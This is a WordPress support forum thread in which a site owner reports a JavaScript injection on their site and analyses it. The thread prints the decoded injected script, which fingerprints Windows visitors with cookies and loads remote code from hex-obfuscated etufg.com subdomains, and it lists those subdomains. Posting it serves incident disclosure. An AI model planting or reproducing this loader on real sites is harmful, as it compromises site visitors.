Support » Fixing WordPress » Javascript Injection Report – based in etufg.com

  • I have just discovered an incident of Javascript Injection on my WordPress-based website. I am running the latest version of WP, and all associated plugins.

    The raw code is inserted just after the opening body tag.

    The raw code is:

    [hack code moderated]

    This can be decoded to:

    <ads><script type="text/javascript">document.write( <script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')};</script> );</script></ads>

    The URL at the end, which seems to be the co-ordinating centre for the attack is in Hex, and translates to:

    etufg.com

    So, this code seems to be randomly picking one of the following subdomains within that domain:

    • keg.etufg.com
    • kei.etufg.com
    • ken.etufg.com
    • kep.etufg.com
    • kev.etufg.com
    • kex.etufg.com
    • key.etufg.com
    • khi.etufg.com
    • kid.etufg.com
    • kif.etufg.com

    I would not be surprised if further subdomains and/or domains are involved, but this is just the rest of my first 40 minutes of investigations.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter Luke Stevenson

    (@lucanos)

    Thanks Samuel, I was more posting it here as it seems to be code which either has not been seen before, or has not been written up like this before (I Googled for segments of the code above, but found no matches).

    Just trying to save someone else a bit of time, effort, and hair should more people be affected.

    post it at pastebin.com and bring the link back here

    Thread Starter Luke Stevenson

    (@lucanos)

    Pastebin of Hack Code

    Not that I can see the point of putting the code on Pastebin, where it might be found through Googling, but with no links back to this Forum post – creating a dead-end for anyone investigating their problem. But, as you are the Mod, I will defer to your judgement.

    the problem putting it here is everyone’s virus alert will start going off and I really don’t want to deal with all the “omg, the forum’s hacked” threads and emails
    :>)

    Thread Starter Luke Stevenson

    (@lucanos)

    But the code had been rendered into HTML and would not execute – so it should not have set off any kind of alerts.

    Any content I share her as a Post is parsed to make it readable – ie “<” changes to “& lt;” (space added to prevent parser from doing the same here), etc. which means that, from the view of the browser, it is content rather than structure and will be displayed, but not executed.

    I don’t understand your point.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Javascript Injection Report – based in etufg.com’ is closed to new replies.